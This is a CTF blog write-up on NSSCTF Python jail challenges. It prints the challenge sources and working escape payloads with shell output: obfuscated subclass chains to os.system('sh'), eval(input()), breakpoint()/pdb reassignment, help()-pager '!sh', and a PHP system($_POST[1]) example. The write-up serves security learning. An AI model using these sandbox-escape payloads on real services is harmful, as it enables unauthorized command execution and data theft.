<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment"># nc node5.anna.nssctf.cn 28230</span><br><br>  _                _                           _       _ _   _                _ __<br> | |              (_)                         (_)     (_) | | |              | /_ |<br> | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| || |<br> | <span class="hljs-string">&#x27;_ \ / _ \/ _` | | &#x27;</span>_ \| <span class="hljs-string">&#x27;_ \ / _ \ &#x27;</span>__|   | |/ _` | | | | |/ _ \ \ / / _ \ || |<br> | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ || |<br> |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_||_|<br>              __/ |                          _/ |<br>             |___/                          |__/<br><br><br>Welcome to the python jail<br>Let<span class="hljs-string">&#x27;s have an beginner jail of calc</span><br><span class="hljs-string">Enter your expression and I will evaluate it for you.</span><br><span class="hljs-string">&gt; getattr(getattr(getattr(getattr(().__class__,chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)),chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4],chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)),chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))</span><br><span class="hljs-string">sh: 0: can&#x27;</span>t access tty; job control turned off<br>$ ls<br>flag  server.py<br>$ cat flag<br>flag=NSSCTF&#123;99f92fea-d1e0-4c04-<span class="hljs-number">8626</span>-7489979ba8da&#125;<br></code></pre></td></tr></table></figure>

<h4 id="calc-jail-beginner-level2"><a href="#calc-jail-beginner-level2" class="headerlink" title="calc_jail_beginner_level2"></a>calc_jail_beginner_level2</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment">#the length is be limited less than 13</span><br><span class="hljs-comment">#it seems banned some payload </span><br><span class="hljs-comment">#Can u escape it?Good luck!</span><br><br>WELCOME = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">  _                _                           _       _ _   _                _ ___  </span><br><span class="hljs-string"> | |              (_)                         (_)     (_) | | |              | |__ \ </span><br><span class="hljs-string"> | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| |  ) |</span><br><span class="hljs-string"> | &#x27;_ \ / _ \/ _` | | &#x27;_ \| &#x27;_ \ / _ \ &#x27;__|   | |/ _` | | | | |/ _ \ \ / / _ \ | / / </span><br><span class="hljs-string"> | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |/ /_ </span><br><span class="hljs-string"> |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|____|</span><br><span class="hljs-string">              __/ |                          _/ |                                    </span><br><span class="hljs-string">             |___/                          |__/                                                                            </span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br><span class="hljs-built_in">print</span>(WELCOME)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Welcome to the python jail&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Let&#x27;s have an beginner jail of calc&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Enter your expression and I will evaluate it for you.&quot;</span>)<br>input_data = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;&gt; &quot;</span>)<br><span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(input_data)&gt;<span class="hljs-number">13</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Oh hacker!&quot;</span>)<br>    exit(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;Answer: &#123;&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">eval</span>(input_data)))<br><br></code></pre></td></tr></table></figure>

<p>该题要求payload的长度不大于13，那么就不能直接__import__(‘os’).system(‘sh’)</p>
<p>但是在php命令执行中，有一种参数逃逸</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/?cmd=<span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);&amp;<span class="hljs-number">1</span>=ls<br></code></pre></td></tr></table></figure>

<p>对于这串命令system中POST的参数就会逃逸到参数1中去，对于这个1的长度是没有一点长度限制的</p>
<p>像这里我们也可以采用类似的手法，想办法搞个命令里面能再输入关键命令，显然<code>input()</code>这个函数就正好符合要求</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">eval</span>(<span class="hljs-built_in">input</span>())<br></code></pre></td></tr></table></figure>

<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs py"> nc node5.anna.nssctf.cn <span class="hljs-number">28561</span><br><br>  _                _                           _       _ _   _                _ ___<br> | |              (_)                         (_)     (_) | | |              | |__ \<br> | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| |  ) |<br> | <span class="hljs-string">&#x27;_ \ / _ \/ _` | | &#x27;</span>_ \| <span class="hljs-string">&#x27;_ \ / _ \ &#x27;</span>__|   | |/ _` | | | | |/ _ \ \ / / _ \ | / /<br> | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |/ /_<br> |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|____|<br>              __/ |                          _/ |<br>             |___/                          |__/<br><br>Welcome to the python jail<br>Let<span class="hljs-string">&#x27;s have an beginner jail of calc</span><br><span class="hljs-string">Enter your expression and I will evaluate it for you.</span><br><span class="hljs-string">&gt; eval(input())</span><br><span class="hljs-string">__import__(&#x27;</span>os<span class="hljs-string">&#x27;).system(&#x27;</span>sh<span class="hljs-string">&#x27;)</span><br><span class="hljs-string">sh: 0: can&#x27;</span>t access tty; job control turned off<br>$ ls<br>flag  server.py<br>$ cat flag<br>flag=NSSCTF&#123;84302f6b-8b13-4cb2-af5e-ecb2fbc6cc89&#125;<br></code></pre></td></tr></table></figure>

<h4 id="calc-jail-beginner-level2-5"><a href="#calc-jail-beginner-level2-5" class="headerlink" title="calc_jail_beginner_level2.5"></a>calc_jail_beginner_level2.5</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment">#the length is be limited less than 13</span><br><span class="hljs-comment">#it seems banned some payload </span><br><span class="hljs-comment">#banned some unintend sol</span><br><span class="hljs-comment">#Can u escape it?Good luck!</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">filter</span>(<span class="hljs-params">s</span>):<br>    BLACKLIST = [<span class="hljs-string">&quot;exec&quot;</span>,<span class="hljs-string">&quot;input&quot;</span>,<span class="hljs-string">&quot;eval&quot;</span>]<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> BLACKLIST:<br>        <span class="hljs-keyword">if</span> i <span class="hljs-keyword">in</span> s:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;i!r&#125;</span> has been banned for security reasons&#x27;</span>)<br>            exit(<span class="hljs-number">0</span>)<br><br>WELCOME = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">  _                _                           _       _ _ _                _ ___    _____ </span><br><span class="hljs-string"> | |              (_)                         (_)     (_) | |              | |__ \  | ____|</span><br><span class="hljs-string"> | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | _____   _____| |  ) | | |__  </span><br><span class="hljs-string"> | &#x27;_ \ / _ \/ _` | | &#x27;_ \| &#x27;_ \ / _ \ &#x27;__|   | |/ _` | | | |/ _ \ \ / / _ \ | / /  |___ \ </span><br><span class="hljs-string"> | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | |  __/\ V /  __/ |/ /_ _ ___) |</span><br><span class="hljs-string"> |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_|_|\___| \_/ \___|_|____(_)____/ </span><br><span class="hljs-string">              __/ |                          _/ |                                          </span><br><span class="hljs-string">             |___/                          |__/                                                                                                            </span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br><span class="hljs-built_in">print</span>(WELCOME)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Welcome to the python jail&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Let&#x27;s have an beginner jail of calc&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Enter your expression and I will evaluate it for you.&quot;</span>)<br>input_data = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;&gt; &quot;</span>)<br><span class="hljs-built_in">filter</span>(input_data)<br><span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(input_data)&gt;<span class="hljs-number">13</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Oh hacker!&quot;</span>)<br>    exit(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;Answer: &#123;&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">eval</span>(input_data)))<br><br></code></pre></td></tr></table></figure>

<p>限制长度不大于13，且ban掉了 exec，input，eval</p>
<p>经过查阅发现可以使用breakpoint()函数进入pdb调试模式，先用step进入模块，可以说使用list检查代码，发现内容被input_data变量接收</p>
<p>对其进行赋值。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs py"> nc node5.anna.nssctf.cn <span class="hljs-number">28031</span><br><br>  _                _                           _       _ _ _                _ ___    _____<br> | |              (_)                         (_)     (_) | |              | |__ \  | ____|<br> | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | _____   _____| |  ) | | |__<br> | <span class="hljs-string">&#x27;_ \ / _ \/ _` | | &#x27;</span>_ \| <span class="hljs-string">&#x27;_ \ / _ \ &#x27;</span>__|   | |/ _` | | | |/ _ \ \ / / _ \ | / /  |___ \<br> | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | |  __/\ V /  __/ |/ /_ _ ___) |<br> |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_|_|\___| \_/ \___|_|____(_)____/<br>              __/ |                          _/ |<br>             |___/                          |__/<br><br><br>Welcome to the python jail<br>Let<span class="hljs-string">&#x27;s have an beginner jail of calc</span><br><span class="hljs-string">Enter your expression and I will evaluate it for you.</span><br><span class="hljs-string">&gt; breakpoint()</span><br><span class="hljs-string">--Return--</span><br><span class="hljs-string">&gt; &lt;string&gt;(1)&lt;module&gt;()-&gt;None</span><br><span class="hljs-string">(Pdb) step</span><br><span class="hljs-string">Answer: None</span><br><span class="hljs-string">--Return--</span><br><span class="hljs-string">&gt; /home/ctf/server.py(34)&lt;module&gt;()-&gt;None</span><br><span class="hljs-string">-&gt; print(&#x27;</span>Answer: &#123;&#125;<span class="hljs-string">&#x27;.format(eval(input_data)))</span><br><span class="hljs-string">(Pdb) list</span><br><span class="hljs-string"> 29     input_data = input(&quot;&gt; &quot;)</span><br><span class="hljs-string"> 30     filter(input_data)</span><br><span class="hljs-string"> 31     if len(input_data)&gt;13:</span><br><span class="hljs-string"> 32         print(&quot;Oh hacker!&quot;)</span><br><span class="hljs-string"> 33         exit(0)</span><br><span class="hljs-string"> 34  -&gt; print(&#x27;</span>Answer: &#123;&#125;<span class="hljs-string">&#x27;.format(eval(input_data)))</span><br><span class="hljs-string">[EOF]</span><br><span class="hljs-string">(Pdb) input_data</span><br><span class="hljs-string">&#x27;</span><span class="hljs-built_in">breakpoint</span>()<span class="hljs-string">&#x27;</span><br><span class="hljs-string">(Pdb) input_data=__import__(&#x27;</span>os<span class="hljs-string">&#x27;).system(&#x27;</span>sh<span class="hljs-string">&#x27;)</span><br><span class="hljs-string">sh: 0: can&#x27;</span>t access tty; job control turned off<br>$ ls<br>flag  server.py<br>$ cat flag<br>flag=NSSCTF&#123;<span class="hljs-number">70489431</span>-119a-4fd3-96ac-f8abbd07c7e1&#125;<br>$<br></code></pre></td></tr></table></figure>



<h4 id="calc-jail-beginner-level3"><a href="#calc-jail-beginner-level3" class="headerlink" title="calc_jail_beginner_level3"></a>calc_jail_beginner_level3</h4><p><a target="_blank" rel="noopener" href="https://cheatsheet.haax.fr/linux-systems/programing-languages/python/#pyjail-generate-a-shell">Offensive Security Cheatsheet (haax.fr)</a></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment">#!/usr/bin/env python3</span><br>WELCOME = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">  _                _                           _       _ _   _                _ ____  </span><br><span class="hljs-string"> | |              (_)                         (_)     (_) | | |              | |___ \ </span><br><span class="hljs-string"> | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| | __) |</span><br><span class="hljs-string"> | &#x27;_ \ / _ \/ _` | | &#x27;_ \| &#x27;_ \ / _ \ &#x27;__|   | |/ _` | | | | |/ _ \ \ / / _ \ ||__ &lt; </span><br><span class="hljs-string"> | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |___) |</span><br><span class="hljs-string"> |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|____/ </span><br><span class="hljs-string">              __/ |                          _/ |                                     </span><br><span class="hljs-string">             |___/                          |__/                                                                                       </span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br><span class="hljs-built_in">print</span>(WELCOME)<br><span class="hljs-comment">#the length is be limited less than 7</span><br><span class="hljs-comment">#it seems banned some payload </span><br><span class="hljs-comment">#Can u escape it?Good luck!</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Welcome to the python jail&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Let&#x27;s have an beginner jail of calc&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Enter your expression and I will evaluate it for you.&quot;</span>)<br>input_data = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;&gt; &quot;</span>)<br><span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(input_data)&gt;<span class="hljs-number">7</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Oh hacker!&quot;</span>)<br>    exit(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;Answer: &#123;&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">eval</span>(input_data)))<br><br><br></code></pre></td></tr></table></figure>

<p>  由于限定大小不大于7，那么之前的payload就不行了。查看大佬的wp，发现在python交互式终端中，可以使用help函数来进行rce</p>
<p>入交互式后，随便查询一种用法，由于太多，会使用more进行展示，造成溢出，在后面使用!命令即可造成命令执行。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">help</span>()<br><br>Welcome to Python <span class="hljs-number">3.8</span><span class="hljs-string">&#x27;s help utility!</span><br><span class="hljs-string"></span><br><span class="hljs-string">If this is your first time using Python, you should definitely check out</span><br><span class="hljs-string">the tutorial on the Internet at https://docs.python.org/3.8/tutorial/.</span><br><span class="hljs-string"></span><br><span class="hljs-string">Enter the name of any module, keyword, or topic to get help on writing</span><br><span class="hljs-string">Python programs and using Python modules.  To quit this help utility and</span><br><span class="hljs-string">return to the interpreter, just type &quot;quit&quot;.</span><br><span class="hljs-string"></span><br><span class="hljs-string">To get a list of available modules, keywords, symbols, or topics, type</span><br><span class="hljs-string">&quot;modules&quot;, &quot;keywords&quot;, &quot;symbols&quot;, or &quot;topics&quot;.  Each module also comes</span><br><span class="hljs-string">with a one-line summary of what it does; to list the modules whose name</span><br><span class="hljs-string">or summary contain a given string such as &quot;spam&quot;, type &quot;modules spam&quot;.</span><br><span class="hljs-string"></span><br><span class="hljs-string">help&gt; modules</span><br></code></pre></td></tr></table></figure>

<p>输入!sh就可以进入shell里面</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">help</span>&gt; re<br>Help on module re:<br><br>NAME<br>    re - Support <span class="hljs-keyword">for</span> regular expressions (RE).<br><br>MODULE REFERENCE<br>    https://docs.python.org/<span class="hljs-number">3.8</span>/library/re<br><br>    The following documentation <span class="hljs-keyword">is</span> automatically generated <span class="hljs-keyword">from</span> the Python<br>    source files.  It may be incomplete, incorrect <span class="hljs-keyword">or</span> include features that<br>    are considered implementation detail <span class="hljs-keyword">and</span> may vary between Python<br>    implementations.  When <span class="hljs-keyword">in</span> doubt, consult the module reference at the<br>    location listed above.<br><br>DESCRIPTION<br>    This module provides regular expression matching operations similar to<br>    those found <span class="hljs-keyword">in</span> Perl.  It supports both <span class="hljs-number">8</span>-bit <span class="hljs-keyword">and</span> Unicode strings; both<br>    the pattern <span class="hljs-keyword">and</span> the strings being processed can contain null <span class="hljs-built_in">bytes</span> <span class="hljs-keyword">and</span><br>    characters outside the US ASCII <span class="hljs-built_in">range</span>.<br><br>    Regular expressions can contain both special <span class="hljs-keyword">and</span> ordinary characters.<br>    Most ordinary characters, like <span class="hljs-string">&quot;A&quot;</span>, <span class="hljs-string">&quot;a&quot;</span>, <span class="hljs-keyword">or</span> <span class="hljs-string">&quot;0&quot;</span>, are the simplest<br>    regular expressions; they simply <span class="hljs-keyword">match</span> themselves.  You can<br>--More--<br>    concatenate ordinary characters, so last matches the string <span class="hljs-string">&#x27;last&#x27;</span>.<br>--More--! sh<br>! sh<br>------------------------<br>--More--!sh<br>!sh<br>------------------------<br>--More--!ls<br>!ls<br>flag  server.py<br>------------------------<br>--More--!cat flag<br>!cat flag<br>flag=NSSCTF&#123;c96135fd-<span class="hljs-number">8475</span>-48df-9a6e-238520cb33ec&#125;<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Pyjail</div>
      <div>http://xiaoxiaoxiaoxiaocai.github.io.com/2023/10/23/Pyjail/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>xiaocai</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>October 23, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/10/24/Airdrop-Hunting/" title="Airdrop Hunting">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Airdrop Hunting</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/10/22/Randomness/" title="Randomness">
                        <span class="hidden-mobile">Randomness</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
